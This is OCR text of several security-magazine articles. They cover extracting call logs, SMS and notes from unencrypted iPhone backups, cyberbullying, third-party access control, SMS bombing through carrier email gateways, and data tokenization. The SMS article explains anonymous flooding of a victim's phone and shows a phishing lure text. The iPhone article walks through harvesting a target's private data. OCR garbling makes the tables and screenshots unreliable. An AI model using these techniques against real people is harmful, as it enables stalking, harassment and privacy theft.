PNG image, 323 x 4B3, B-bit/color RGB, non-interlaced 

PNG image, 323 x 4B3, B-bit/color RGBA, non-interlaced 

PNG image, 4B3 x 323, B-bit colormap, non-interlaced 

PNG image, B35314566 x 396263525, 3-bit grayscale, 

SQLite 3.x database 

SQLite 3.x database, user version 3 

SQLite 3.x database, user version 3276B6 

XML document text 

data 

empty 
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Luckily for me, the file names don't give any- 
thing away. The file extensions are related, 
though. 

A quick Google search can tell the thieves 
that each .mdinfo file has a relating .mddata 
file and that they're created by the iPhone/ 
iTunes backup process. 



Take the 

ffe6ddb2ac75ba5b56 1 690c59aafdf5b600 1 bee 
4.mddata file as an example. A quick "file" on 
that can reveal it's "JPEG image data, EXIF 
standard", which indicates that the file is in- 
deed a JPEG. If "strings" is run on the relating 
.mdinfo file, interesting information will come 
to light: 



zonbi: data_dir mattj strings f f e6ddb2ac75ba5b561630c59aaf dt5b6001bt:e4. mdinfo 
bplist98 

WVersion [IsEncrypted"5torageVersionXMetadata [AuthVersion53.0 

51.00 

bplist00 

TPathWVersionXGrey l.istVDomain_ 
Media/DCIH/100APPLE/IHG_0103. JPGS3.B 
[MediaDomain 
1 . DUV 

bsi.a 

'67KQPT 



One can clearly see a file name with the as- 
sociated path in that output, and that could 
lead to the assumption that this is an image 
taken with the iPhone camera. It still doesn't 
provide information such as geo-location data, 
but I'm sure the exif data will be a veritable 
treasure trove. 

Plist files: friend, enemy or just a very 
noisy neighbor? 

Before we dig any deeper into the backup 
files and start poking around the SQL data- 
bases, let's take a look at those three files we 
flagged at the very beginning. 

First off, we have the Info. plist file. For those 
of you who are new to the OS, the plist file is 
a "Property List" file and holds information 
about applications and the like. In this case, it 
holds various information about my iPhone. 

It's a simple, easy-to-read XML formatted file, 
from which a lot of information about the 
iPhone can be learned: 

• Build Version 

• Device Name 

• IMEI number 

• Last Backup Date 

• Serial Number 

• Target Identifier (which matches our backup 
directory magic number) 

• iTunes Version. 



There are also a bunch of base64 encoded 
files within the plist file. Free beers to the per- 
son who can decode them and tell (INSE- 
CURE Magazine what they contain (beer will 
be provided by the author and not the 
magazine.) 

Next up is the Manifest.plist file. It contains 
four keys: 

• AuthSignature 

• Auth Version 

• Data 

• IsEncrypted 

This file is used as a manifest for the backups 
to check for file corruption. Again, it looks like 
the Data portion is encoded in base64, but I 
haven't had the chance to verify this. 

Finally, we have the Status. plist file, which 
contains one key: 

<key>Backup Success</key> 

Not really useful for anything other than time 
stamping the last successful backup of the 
iPhone. 

The meat and potatoes 

Now that we've gone through the basics and 
found where we can get information about the 
iPhone (as well as grab any images that were 
held on the device), it's time to dig into the 
SQLite databases. 
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On my backup there were quite a few of them 
- 37 in total. The SQLite databases hold all 
sorts of information about applications on the 
iPhone, the SMS database, the contacts da- 
tabase, as well as things like the Calls data- 
base. Since the files are not encrypted, ex- 
tracting information from them is extremely 
easy. 

The commands we're going to use here are: 



.dump - Dump entire database out. 
.tables - Describe the tables in the database. 
SELECT - You should know basic SQL 
statements by now. 

Probably the most interesting thing are the 
phone Call logs. If we do a "SELECT * FROM 
calls", we get a similar table: 



519 


+27H 


H 1256071607 | ::: |4|-i 


520 




H| 1256975423|72 |5 |-1 


521 


+27^H 


1 1256976792 1 114 | 4 | -1 


522 


+27H 


1 1256978601 1 9 | 4 | -1 


523 




■B 1 1256980615 1 19 | 4 | -1 


524 


+ 27H 


^^■1 1256980969 1 138 1 4 | -1 


525 




^H|1256993252|30|5|358 


526 


+27^ 


1 1256993412 1 441 1 4 | -1 


527 


+27^H 


1 1257015607 | 0 1 1507333 | 358 


528 




^^■1 1257015627 | 557 | 4 | -1 



As you can see, the logs are all kept in a neat 
fashion. What's more, you can see exactly 
what happened during those calls. Through a 



little trial and error I came up with the follow- 
ing analysis of the entries. If I am wrong, 
please feel free to correct me. 



Assumption : 

500 | *27^^^^B 1 1256B04196 | 29 | 5 | 393 
1 2 3 4 5 6 



Position one is the call number in the data- 
base. This will increase sequentially after 
more calls are made. 

Position two is the actual number that was di- 
aled. 

Position three is the epoch time when the call 
was made. A simple bit of perl (perl -e 'print 
scalar(gmtime(1 2568041 72)), "\n"') will give 
you the time in numbers us humans can read. 
Position four is the duration of the call in 
seconds. 

I haven't been able to figure out yet position 
five. It flips between a 4 or a 5 and there 
doesn't seem to be a relation to the type of 
call made. If anyone knows the answer to this, 
please feel free to get in touch with me. 

I believe position six to be the status of the 
call. If the call is missed, the field is filled with 
However when the call is successful it's 
filled with either 358, 398, 388 or 348. I can't 



figure out the significance of these numbers 
so if anyone has more information, please let 
me know. 

The other SQLite databases of interest are 
the Notes databases. If you're really lucky, 
you can find notes on passwords to servers, 
IP addresses and all the usual stuff people 
want to store but don't think to store it in 
something that should be encrypted. 

There's also the SMS database, which is very 
similar to the Calls database. It contains fields 
denoting message status, number of the 
sender and the like - a great source of 
information on your target. 

Finally there are databases on installed appli- 
cations. Is the iPhone owner using Facebook? 
The Facebook database has all the contacts 
of that user. There isn't anything juicy like us- 
ernames or passwords, but there are links to 
the contacts profile picture. 
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This is presumably used by the application for 
the profile picture. Not very useful for anything 
other than stalking. Probably the biggest 
headache of the SQLite databases is that 
they cannot be easily identified. The file 
names look like a SHA1 hash, so finding out 
what a SQLite database contains is a trial and 
error process. You could script a lot of it which 
would make life a lot easier. 

At the end of the day an unencrypted backup 
of an iPhone is a treasure chest just waiting to 
be opened and dug through. The amount of 
information that can be found out about a tar- 
get simply by digging through the various files 
with simple Unix/Linux tools is astonishing. 



While it can be argued that getting hold of a 
laptop with this sort of setup in place is a little 
difficult (nearly impossible some would say), 
you just have to look at the stats of lost lap- 
tops at airports to see that the possibility is 
there. 

The moral of this story? Encrypt. Everything. 
Always. 

It takes an insignificant amount of effort to be 
a little more secure and you will be thanking 
your lucky stars when your machine is stolen. 
Most of the time the machines are probably 
wiped and reinstalled for resale, but these 
days, you never know who is after what. 



Matt Erasmus is an info-sec professional, packet junkie and Mac addict from South Africa. 
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The GRC Meeting 2010 aims to 
bring to participants, the main 
challenges that managers involved 
in the areas of IT Governance, 
Risk & Compliance has, in order to 
also share strategies, solutions and 
methods best suited to deal with 
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afterthe global economic crisis. 
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As many children wrap up another school year, I'm reminded of the fact that 
for most, the past few months have left them with fond and lasting memories 
of friends, achievements and milestones - memories that they will cherish in 
later years. The problem of cyber bullying, however, makes this assumption 
invalid for a growing number of students. 



Today, this problem is far worse than when 
school children picked on kids during recess 
periods and inside the schoolyard, because 
the perpetrators of computer-generated taunts 
can now access their victims 24 hours a day, 
seven days a week. 

The numbers are staggering. The National 
Crime Prevention Council released this eye- 
opening statistics in 2007: 

• More than 40 percent of all teenagers with 
Internet access have reported being bullied 
online. 

• A mere 1 0 percent of those kids who were 
bullied told their parents about the incident, 
and that only 1 8 percent of the cases were 
reported to a local or national law enforcement 
agency. 



• Fifty-eight percent of 4th through 8th graders 
reported having mean or cruel things said to 
them online. 53 percent said that they have 
said mean or hurtful things to others while on- 
line. 42 percent of those studied said they had 
been "bullied online", but almost 60 percent 
never told their parents about the incident. 

• Ten percent of 770 young people surveyed 
were made to feel "threatened, embarrassed 
or uncomfortable" by a photo taken of them 
using a cell-phone camera. 

While schools can't watch students around the 
clock, they can at least ensure that their net- 
works, just like their playgrounds, are safe for 
kids. Protection against these kinds of attacks 
is arguably more critical for educational institu- 
tions than ensuring personal data is not com- 
promised, because the negative impact of cy- 
ber bullying can have far greater implications. 
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Take 15-year old Phoebe P., for example. The 
Massachusetts teenager committed suicide 
last January, after having been the recipient of 
a continuous barrage of mean online mes- 
sages and emails. 

Action is most certainly required. So, here are 
some effective strategies educators should 
implement to counter cyber bullying before the 
beginning of the new school year. 

• Start using strong email/IM gateway filtering 
platforms. Internal school emails and IM chat 
platforms are the easiest way for bullies to ac- 
cess their victims. Thankfully, there are cost- 
effective, robust turnkey systems on the mar- 
ket that can plug into existing systems and set 
up a virtually impenetrable wall between the 
perpetrators and their targets. 



• Make sure everyone knows you're watching 
and on the job. Most criminal acts (cyber bul- 
lying included) are conducted in secrecy. 
Shedding light on the perpetrators' activities 
by telling them that they're being watched is a 
great tactic in this particular situation. 

• Call for backup. Schools and educators 
should not have to fight cyber bullies alone, 
but rather get help from their system integra- 
tors and product vendors. The best partners 
are the ones who have offerings that specifi- 
cally counter current and future attacks of this 
nature. 

This scourge must end, and teachers, princi- 
pals and parents are the ones who must do it. 
It's time they had the tools and experts at their 
disposal to make it happen. 



Max Huang is the founder and CEO of 02Security (www.o2security.com), a manufacturer of network security 
appliances and disaster recovery offerings. He can be reached at max.huang@o2security.com. 
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Tracks Eraser Pro (www.net-security.org/software.php?id=268) 

Tracks Eraser Pro is a privacy cleaner that can clean up all Internet tracks and other activity trails 
on your computer. With only one click, Tracks Eraser Pro allows you to erase the browser cache, 
cookies (with option to keep certain ones), history, typed URLs, auto-complete memory as well as 
index.dat from your browser, and Windows temp folders, run history, search history, open/save 
history, recent documents and more. 



DSPAM (www.net-security.org/software. php?id=582) 

DSPAM is an extremely scalable, open-source statistical anti-spam filter. While most commercial 
solutions only claim a mere 95% accuracy (1 error in 20), a majority of DSPAM users frequently 
see around 99.95% (1 error in 2000) and can sometimes reach peaks as high as 99.991% (2 er- 
rors in 22,786, as with one particular user). 



Samhain (www.net-security.org/software. php?id=1 25) 

Samhain is an open source file integrity and host-based intrusion detection system. It can run as a 
daemon process, and and thus can remember file changes - contrary to a tool that runs from cron, 
if a file is modified you will get only one report, while subsequent checks of that file will ignore the 
modification as it is already reported (unless the file is modified again). 



Server Inspector (www.net-security.org/software. php?id=574) 

Server Inspector is a professional monitoring tool. You can monitor Windows services, websites, 
applications, files, drives, hosts and databases. In case of an emergency Server Inspector can no- 
tify you via e-mail, SMS or a network message. 
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With the increasingly combative nature of Information Technology 
Security in the workplace, the need for skilled Security 
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levels. Theoretical knowledge obtained from educational 
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Resource personnel are often times unable to quantify a potential 
employee's battlefield ability. 
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personnel and decision-makers the ability to select and hire future 
company employees based on reviews gleaned frum a non- biased 
evaluation process conducted by industry peers and experts. 
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* Placement of available positions for hire into a targeted 
environment. 

* Vetting and Verification of potential Employees' curriculum 
vitae by similarly skilled peers 

* Eva lu a tio n a nd Reco mm en d ati o n of potentia I Empl oyees, vi a 
ski 1 1 -foe used interviews conducted by a two tier panel of IT 
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One of the most valuable benefits of the Internet is its ability to foster high 
levels of information sharing and collaboration. Not only has the Internet en- 
abled massive efficiency gains for when it comes to managing complex sup- 
ply chains, it is in and of itself a supply chain for the distribution of informa- 
tion. The ability to engage online has provided government agencies with a 
wealth of strategic opportunities, especially when it comes to leveraging em- 
ployees, partners and contractors in ways that might not feasible outside of 
cyberspace. 



However, stringent security and compliance 
requirements require government agencies to 
maintain strong controls over how information 
and people are managed online - and be able 
to demonstrate that those controls are always 
in place. So how do IT departments manage 
the catch-22 of opening up their networks to 
strategic third parties without risk of exposing 
critical systems or data? 

From a technology perspective, the major shift 
that needs to occur is to design and imple- 
ment controls from a user-centric point of 
view. While this might not sound like a big 
deal, network security is by nature device- 
centric. Let's look at some real world scenar- 
ios where a user or an identity-based ap- 
proach to access control becomes a huge 
business enabler. 



Outsourcing: Outsourcing is one of the most 
mature use cases for third-party access con- 
trol. Managed security services, which are just 
a portion of the overall managed services 
market, was estimated by Forrester to be a $3 
billion industry in 2008, and provides a good 
example of why a company would want an 
outsider to have unfettered access to critical 
systems. Outsourcing the daily management 
of critical infrastructure can save companies a 
significant amount of time and money. 

But with the rewards of outsourcing come new 
risks, such as opening up the network to your 
outsourcing partner. This risk is amplified by 
the fact that users tend to be technically savvy 
and require access to critical systems. If they 
wanted to do harm they are well positioned to 
do so, and if they make a mistake it could 
have significant repercussions. 
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Cloud computing: Could computing has 
been getting a lot of attention lately, but the 
reality is that many of the same rules that ap- 
ply for MSSP's also apply in cloud scenarios. 
In cloud environments you might have a vari- 
ety of administrators accessing cloud infra- 
structure to manage and configure the infra- 
structure and cloud customers that require ac- 
cess to their data - in both cases there can be 
huge consequences if either sets of users ac- 
cessed anything but authorized systems and 
data. Third party access control systems pro- 
vide many of the controls that remove many of 
the security and compliance issues that are 
currently inhibiting mass adoption of Cloud 
Computing. 

Cross-agency development/information 
sharing: In the federal arena, inter- and intra- 
agency information sharing - especially when 
it comes to application development - is an 
area of significant innovation. However, creat- 
ing an environment where individuals have 
varying security clearances and strict informa- 
tion assurance requirements can be a chal- 
lenge - especially if they need to move around 
the network, which is a common requirement 
in joint development scenarios. 

Managing supply chains: A sophisticated 
supply chain requires multiple parties to have 
access to multiple applications or systems. In 
some cases, a simple portal model will suffice. 
In other cases, if competitors are bidding for a 
specific job, or in the transfer of sensitive 
goods, supply chain tracking can only work if 
strong controls are in place that dictate who 
has access to what systems. 

Knowing that there are no silver bullets or 
one-size-fits-all solutions for security, here are 
some of the fundamental requirements for im- 
plementing the access controls required to 
enable the above scenarios: 

1) Policy-driven: At the start of any technol- 
ogy deployment, common sense dictates an 
audit of current access polices to see if they 
are aligned with the needs of the business. If 
they aren't, they need to be adjusted in a way 
that is flexible enough to account for future 



change. This should be part and parcel of any 
access control solution. If the policy engine is 
not native to the specific solution, it should be 
able to integrate and communicate with other 
systems where access policies may already 
reside. 

2) Enforceable: Policies are useless without 
the ability to enforce them. While this might 
sound like a no brainier, the reality is that the 
more secure a system is, the more complex it 
is to manage and use. While you don't want 
trusted outsiders to have free reign on the 
network, you do want them to have easy ac- 
cess to the systems they need to access in 
order to do their jobs. Access rights and privi- 
leges are dictated via policies, and enforced 
via controls. 

3) Auditable: Access control solutions must 
provide robust reporting and auditing capabili- 
ties where information can be easily dissemi- 
nated to a diverse set of stakeholders with 
varying agendas. For example, a business 
lead might want a report that shows that no 
one went anywhere on the network they were 
not supposed to and that there are no compli- 
ance violations. An IT administrator might want 
much more granular audit trail that can be 
used for compliance, forensics, e-discovery, 
SLAs, etc. 

4) "Future-proof": Interoperability with legacy 
and future systems should be a given with any 
emerging technology. This is a fine line to 
walk. For example, many private and public 
sector agencies are embracing virtualization/ 
Cloud computing as a way to maximize re- 
sources while minimizing costs. That having 
been said, some of the world's most powerful 
networks are still powered by mainframe sys- 
tems that will need to talk to those virtualized 
environments. Making sure access control 
systems are both backward and forward com- 
patible will lower the TCO and raise the ROI of 
ANY technology investment. While this is just 
a baseline, it's a good start - any solution 
without these attributes will not provide the 
security and compliance controls needed for 
secure collaboration. 



Dave Olander is the SVP Engineering at Xceedium (www.xceedium.com), where he oversees the evolution of 
the Xceedium GateKeeper. 
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According to recent news, users use their mobile phones for many tasks, but 
relatively few phone calls. Instead of calling, people prefer to send text mes- 
sages and use their mobile phone for browsing, listening to music and email- 
ing. Three-quarters of the teen population and 90 percent of households in the 
United States have a mobile phone. However, according to industry data, the 
amount of voice minutes has stagnated, while the number of text messages 
has increased considerably. 



It's no wonder, then, that the cracker commu- 
nity sees the SMS mode of communication as 
an opportunity to exploit and a way of reaping 
maximum benefits. In the last two years, there 
has been a substantial rise in attacks con- 
ducted via text messages. The bad guys are 
working hard to find a way to exploit mobile 
devices by taking advantage of a vulnerability 
or a loophole in texting. 

But, let us revisit some of the popular exploits 
used recently. 

In the spring of 2009, smartphone users were 
taken aback by the sophistication of an SMS 
worm attack known as YXES, which targeted 
Symbian devices. The worm delivered a text 
message with a link to a website that, if fol- 
lowed, would allow a malicious payload to be 
downloaded onto the victim's device. Once it 
was infected, the malicious payload attempted 
to send SMS' to contacts in the victim's phone 



log. This worm also stole the victim's device 
information and uploaded it to a server. 

In the summer of 2009, researchers did a live 
demonstration of an exploit at BlackHat con- 
ference, which allowed them to take complete 
control of victim's iPhone by sending a unique 
SMS message. Later, in the fall of 2009, RIM 
issued an advisory about a certificate-handling 
flaw that could allow an attacker to trick users 
into visiting a malicious websites via SMS 
messages. 

A denial of service attack - dubbed "Curse of 
Silence" - that limits the number of SMS' that 
can be received by a mobile device, was dis- 
closed and demonstrated at 25th Chaos 
Communication Congress (25C3) in 2008, 
and it also involved sending a specially crafted 
SMS message to the victim's mobile device. 
According to the security researchers at 
Pennsylvania State University, attackers 
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could cause denial of service by spamming 
the mobile network and, if successful, they 
could cripple it. 

Last, but not least, is the ubiquitous threat to 
which every smartphone device platform is 
vulnerable: SMS spamming. 

Neither smartphones nor service providers 
offer a feature that could regulate the flow of 
incoming text messages and verify its con- 
tents on the user's device. Thus, smartphone 
users are vulnerable to attacks via SMS and 
spam text messages sent by companies that 
want to promote their products. These unsolic- 
ited text messages are not only irritating, but 
they can also pose a security risk to the users. 

Considering the increase in SMS-based at- 
tacks on the smartphone, it has become es- 
sential to have certain policies in place to ver- 
ify and regulate incoming text messages. This 
article aims to educate users about the fact 
that SMS spamming can be easily executed, 
while simultaneously maintaining complete 
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SMS spamming via Linux 

The previous section discusses an application 
that can send a large number of spam text 
messages to the victim. However, there is also 
an easier way of doing this: a spammer can 
use a script. 

The script that I tested sends two hundred and 
fifty text messages to the victim. Nevertheless, 



anonymity. To clarify this point, this article will 
discuss Windows and Unix-like platform 
based SMS spamming techniques. 

SMS spamming via Windows 

On Windows, the spammer can use an appli- 
cation like "SMS bomber" that can be easily 
coded using VB (Visual Basic) or Java. This 
application has a simple front-end that re- 
quires the following information: victim's 
phone number, service provider, message and 
number of times the SMS will be sent (as 
shown below). 

Once the spammer clicks on the "BOMB" but- 
ton, the application composes an email mes- 
sage similar to the message shown in below, 
and emails it to the SMS gateway of the vic- 
tim's service provider. The email address of 
the SMS gateways of the various service pro- 
viders is publicly available on numerous sites 
and public forums, s and the developer can 
use this information in its application. 
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this number can be changed to hundreds or 
thousands and even higher - to an extent that 
it can even clog the network resources. 

I tested the script on a T-Mobile and Verizon 
number and the results are shown on the fol- 
lowing page - Windows HTC and BlackBerry 
devices. 



www.insecuremag.com 



72 



Inh-ri:-! 



[Wrlvi>d , CQtW&SiitfQtt With 30.55 



JO^O) JtJZHM It 

rnfrny.H;ri*(ibilc--n ijni.J-f crrt . WAR... 

(Ij <fcl?PM LE 

rwiny.^riHibiltiin ypi id^AVIIh .■' WAR... 
JULU(|J JtlZPM \X 

rofin^.f mobile*? gmjlcani^ WAR... 



K.ij... - ■& nT- »f:iiu.<jA iic jiwi 
JUMUCl] JtlZ KM IE 

irH-iriy.-qriH-ihiilr .iijri i.-J-ffiri-k : WAR... 

rwinr.^nHjbileHi'vindrfjiurn! / WAR... 
j mi (■] jbiz m ik 

■ iWinji.-vriH-ihili^.ii3ri i.kJ.ffiri-k ; WAR... 
nfirtfi (I] 5><£PM IE 

rutiny.anKibie^yiirfjmnt / WAR... 



;{MWfr<;»:ri 




.30 r >5 PMJ: 
run 1 y . ■■. i 1 11 ■ t :- ■ I ■ ■ n i.pi miI.kjiii .■' 
WAfiUNR!!!! .'' /ninr di^ic f lu'. 
been hwkecl, Immediately click en 
tli? fallowing Ink: httix/.-' 

tn iyiirP.1 lhi 1/ Pvit.hji l 



'-'Ml 



«12^2pronriy,smtJ. 
w l2:32proriny.sm£i. 
* l2.:32pntfiny.smo. 
^» 12:32pponny.smo. 



(WARNING, 
(WARNING, 
(WARNING. 
(WARNING, 



May la, 2010 12:32; 10 PM 



12:32prt)nny_smQ... {WARNING... 



(WARNING!!! !)Yrjur device has beer 
hacked. Immediately cl ck on th e 
fol lowing link: tottp:// 
rtinyurl.com/2vefaciq 



« 1 2 : J 2p non ny.sm<3 
**12;3?pronny.5ino 
«12;32pronny,smo 
- 12 32prcririy.smo 
wi2:32prOnny.$mti 



(WARNING, 
(WARNING, 
(WARNING, 
(WARNING, 
(WARNING, 



■ M3yl&, 2010 12:32;0&PM 
(WARN IN G ! ■ ! ! ) You r device has been 
hacked. Immediately ckk on the 
.following link: rtttp:// 



is— 1 



Anti-spam on the smartphone 

Anti-spam technology for SMS spam differs 
from anti-spam technology for email spam. 
Due to the limitation in the control of third 
party vendors over the features supported by 
mobile platforms, the endpoint anti-spam 
security is the most feasible solution. 

The following options should be useful: 



• Prompt to Block Ignored Callers - Generates 
a prompt message before ignoring the SMS/ 
call from a blocked number. 

SMS messages sent over the Internet using 
software applications like SMS Bomber do not 
have an originating number. Thus, when the 
service vendor delivers that SMS to the victim, 
the SMS appears to be originating from a 
four-digit number. 



• Enable SMS/Call blocking - Blocks SMS/ 
calls from specific numbers. 

• Enable Shortcode Blocking - Blocks SMS 
from numbers that have five or fewer digits. 



If there's anti-spam on the user's device, and 
the "Enable Shortcode Blocking" setting is on, 
the technology blocks the SMS' coming from a 
number less that contains less than five digits 
and logs the result into the spam log. 



Mayank Aggarwal is a security researcher at Global Threat Center, SMobile Systems. His research focuses on 
exploiting security loopholes in smartphones, malware analysis and reverse engineering. He is a certified ethi- 
cal hacker (CEH) and a Sun certified Java programmer (SCJP). (maggarwal@smobilesystems.com, twitter: 
unsecuremobile). 
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A new scalable approach to data tokenization 

by Ulf Mattssonl 



This is a new approach to data tokenization - one that eliminates challenges 
associated with standard centralized tokenization. 



The usual way of generating tokens is prone 
to issues that impact the availability and per- 
formance of the data, particularly when it 
comes to high volume operations. From a se- 
curity standpoint, it is critical to address the 
issue of collisions caused when tokenization 
solutions assign the same token to two 
separate pieces of data. 

This next generation tokenization solution ad- 
dresses all of these issues. System perform- 
ance, availability and scaling are enhanced; 
numeric and alpha tokens are generated to 
protect a wide range of high-risk data; key 
management is greatly simplified; and colli- 
sions are eliminated. This new approach has 
the potential to change where tokenization 
can be used. 

Different ways to render data unreadable 

There are three different ways to render data 
unreadable: 

1) Two-way cryptography with associated key 
management processes 



2) One-way transformations including trunca- 
tion and one-way cryptographic hash 
functions 

3) Index tokens and pads. 

Two-way encryption of sensitive data is one of 
the most effective means of preventing infor- 
mation disclosure and, consequently, fraud. 
Cryptographic technology is mature and well- 
proven. The choice of encryption scheme and 
topology is critical in deploying a secure, 
effective and reasonable control. 

Hash algorithms are one-way functions that 
turn a message into a fingerprint and are usu- 
ally no more than a dozen bytes long. Trunca- 
tion will discard part of the input field. These 
approaches are used to reduce the cost of 
securing data fields when data is not needed 
to do business and when there will never be a 
need to get the original data back again. 

Tokenization consists of substituting sensitive 
data with replacement values that retain all 
the essential characteristics without compro- 
mising the security of the data. 
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A token can be thought of as a claim check 
that an authorized user or system can use to 
obtain sensitive data such as a credit card 
number. When implementing tokenization, all 
credit card numbers usually stored in busi- 
ness applications and databases are removed 
and placed in a highly secure, centralized en- 
cryption management server that can be pro- 
tected and monitored by using robust 
encryption technology. 

A central token solution 

• Minimize the risk of exposing data with in- 
trinsic value 

• Reduce the number of potential attack tar- 
gets 

• Reduce the cost of PCI assessment. 

All industries can benefit from centralization 
and tokenization of data. Tokenization is about 
understanding how to design systems and 
processes to minimize the risk of exposing 
data elements with intrinsic (or market) value. 



An enterprise tokenization strategy reduces 
the overall risk to the enterprise by limiting the 
amount of people having access to confiden- 
tial data. When tokenization is applied strate- 
gically to enterprise applications, confidential 
data management costs are reduced and the 
risk of a security breach is eliminated. Secu- 
rity is immediately strengthened by reducing 
the number of potential targets for would-be 
attackers. Studies have shown annual audits 
average $225K per year for the world's larg- 
est credit card acceptors. 

Any business that collects, processes or 
stores payment card data is likely to gain 
measurable benefits from central tokenization. 
Most of the tokenization packages available 
today are focused on the Point of Sale (POS), 
card data is removed from the process at the 
earliest point and a token number with no 
value to the attacker is provided. These ap- 
proaches are offered by third party gateway 
vendors and other service providers. 



MYTH: DATA IS GONE FOREVER IF YOU LOSE ACCESS TO THE ENCRYPTION KEYS. 



Common myths about tokenization 

Myth: Data is gone forever if you lose access 

to the encryption keys 

Myth: Do not encrypt data that will be 

tokenized 

Myth: Tokens transparently solve everything. 

There is a lot of erroneous information about 
tokenization out there. For example, that to- 
kenization is better than encryption because 
"if you lose access to the encryption keys the 
data is gone forever." This issue exists with 
both tokenization and encryption, and in both 
cases can be managed through proper key 
management, and secure key recovery proc- 
ess. Both a key server and a token server can 
crash, and therefore must have a backup. The 
token server is often using encryption to en- 
crypt the data that is stored there, so the to- 
ken server may also lose the key. A solid key 
management solution and process is a critical 
part of any enterprise data protection plan. 

Some articles encourage businesses not to 
encrypt data that they plan to tokenize. They 



claim that encrypted data takes more tokeni- 
zation space than clear text data, and that 
many forms of sensitive data contain more 
characters than a 16-digit credit card number 
causing storage and manageability problems. 
This is untrue if you are using Format- 
Controlling Encryption (FCE). Telling compa- 
nies not to encrypt because of an issue that is 
easily addressed denies them a critical layer 
of security that adds to the defense of sensi- 
tive data. 

Tokenization can often be a complicated affair 
in larger retail environments or enterprises 
because the data resides in many places, dif- 
ferent applications, and service providers. Ap- 
plications which have to process the real 
value of the data would need to be reworked 
to support tokenization. The cost of changing 
the application code can be hard to justify 
when considering the level of risk reduction. 
Regardless of industry, if the data resides in 
many different places, switching to tokeniza- 
tion will probably require some programming 
changes and you may not be able to rebuild if 
using a legacy application. 
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Tokenizing and the data lifecycle 

The combined approaches of tokenization 
and encryption can be used to protect the 
whole data lifecycle in an enterprise. It also 
provides high quality production level data in 
test environments, virtualized servers and 
outsourced environments. 

In the development lifecycle there is a need to 
be able to perform high quality test scenarios 
on production quality test data by reversing 
the data hiding process. Key data fields that 
can be used to identify an individual or corpo- 
ration need to be cleansed to depersonalize 
the information. In the early stages of imple- 
mentation, cleansed data needs to be easily 
restored (for downstream systems and feed- 
ing systems). This requires two-way process- 
ing. The restoration process should be limited 
to situations for which there is no alternative 
to using production data. 

Authorization to use this process must be lim- 
ited and controlled. In some situations, busi- 
ness rules must be maintained during any 
cleansing operation (addresses for process- 
ing, dates of birth for age processing, names 
for gender distinction). There should also be 
the ability to set parameters, or to select or 
identify fields to be scrambled, based on a 
combination of business rules. 

Should a company build their own 
tokenizing solution? 

Developing all the capabilities to build an in- 
house solution can present significant chal- 
lenges. In order to implement tokenization ef- 
fectively, all applications that currently house 
payment data must be integrated with the 
centralized tokenization server. Developing 
either of these interfaces would require a 
great deal of expertise to ensure performance 
and availability. Writing an application that is 
capable of issuing and managing tokens in 
heterogeneous environments that can support 
multiple field length requirements can be 
complex and challenging. 

Furthermore, ongoing support of this applica- 
tion could be time consuming and difficult. Al- 
locating a dedicated resource to this large un- 
dertaking and covering for responsibilities 



could present logistical, tactical, and budget- 
ary challenges. 

For many organizations, locating the in-house 
expertise to develop such complex capabili- 
ties as key management, token management, 
policy controls, and heterogeneous applica- 
tion integration can be very difficult. Writing 
code that interfaces with multiple applications, 
while minimizing the performance impact on 
those applications, presents an array of chal- 
lenges. The overhead of maintaining and en- 
hancing a security product of this complexity 
can ultimately represent a huge resource in- 
vestment and a distraction from an organiza- 
tion's core focus and expertise. 

Security administrators looking to gain the 
benefits of centralization and tokenization 
without having to develop and support their 
own tokenization server, should look at 
vendors that offer off-the-shelf solutions. 

Reasons to keep the token server in-house 

• Liability and risk 

• Many applications use or store data 

• Multi-channel commerce 

• Security of outsourcing 

• Recurring cost of tokenization when data 
volume is increasing, since outsourcing may 
charge based on transaction volume 

• Issues of transparency, availability, perform- 
ance and scalability. 

Typically, companies do not want to outsource 
secure handling of data since they cannot 
outsource risk and liability. Organizations are 
not willing to move the risk from its environ- 
ment into a potentially less secure hosted en- 
vironment. Furthermore, enterprises need to 
maintain certain information about transac- 
tions at the point of sales (POS), as well as on 
higher levels. In most retail systems, there are 
multiple applications that use or store card 
data, from the POS to the data warehouses, 
as well as sales audit, loss prevention, and 
finance. At the same time, the system needs 
to be adequately protected from data thieves. 

Merchants who gather card data via Web 
commerce, call centers and other channels, 
should ensure that the product or service they 
use can tokenize data through all channels. 
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Not all offerings in the market work well or 
cost-effectively in a multi-channel environ- 
ment, particularly if the token service is out- 
sourced. Merchants need to ensure that their 
requirements reflect current and near-future 
channel needs. Another concern is that to- 
kenization is new and unproven and can pose 
an additional risk relative to mature encryption 
solutions. 

A risk management analysis will reveal 
whether the cost of deploying in-house to- 
kenization is worth the benefits. An out- 
sourcing environment must be carefully re- 
viewed from a security point and provide a 
reliable service to each globally connected 
endpoint. Many merchants continue to object 



to having anyone keep their card data other 
than themselves. Often, these are leading 
merchants that have made significant invest- 
ments in data security and simply do not be- 
lieve that any other company has more moti- 
vation (or better technology) than they do to 
protect their data. 

Along with separation of duties and auditing, a 
tokenization solution requires a solid encryp- 
tion and key management system to protect 
the information in the centralized token server. 
By combining encryption with tokenization, 
organizations can have security, efficiency, 
and cost savings for application areas within 
an enterprise. 



HOLISTIC SOLUTIONS CAN SUPPORT END-TO-END FIELD ENCRYPTION, WHICH IS 
AN IMPORTANT PART OF THE PROTECTION OF THE SENSITIVE DATA FLOW. 



Holistic solutions can support end-to-end field 
encryption, which is an important part of the 
next generation protection of the sensitive 
data flow. In some data flows, the best combi- 
nation is end-to-end field encryption utilizing 
format controlling encryption from the point of 
acquisition and into the central systems. At 
that point, the data field will be converted to a 
token for permanent use within the central 
systems. A mature solution should provide 
this integration between encryption/ 
tokenization processes. 

Security is addressed by running the tokeni- 
zation solution in-house on a high security 
network segment isolated from all other data 
and applications. If a segmented approach is 
used, most tokenization requests will need to 
be authorized to access this highly sensitive 
server. Access to the token server must be 
provided based on authentication, authoriza- 
tion, encrypted channel and monitoring and/or 
blocking of suspicious transaction volumes 
and requests. 

Transparency, availability, performance, scal- 
ability and security are common concerns with 
tokenization, particularly if the service is out- 
sourced. Transparency can be enhanced by 
selecting a tokenization solution that is well 
integrated into enterprise systems like data- 
bases. Availability concerns can be addressed 
by selecting a tokenization solution that is 



running in-house on a high availability plat- 
form. Performance issues can be addressed 
by selecting a tokenization solution that is 
running locally on your high transaction vol- 
ume servers. Scalability is best addressed by 
a selecting a tokenization solution that is run- 
ning in-house on your high performance cor- 
porate back-bone network. 

The solution: Distributed tokenization 

Distributed tokenization is a method of storing 
sensitive strings of characters on a local 
server. This new approach changes where 
tokenization can be used. After years of re- 
search and development, Protegrity has de- 
veloped a solution by intelligently altering the 
traditional backend processes used in 
tokenization. 

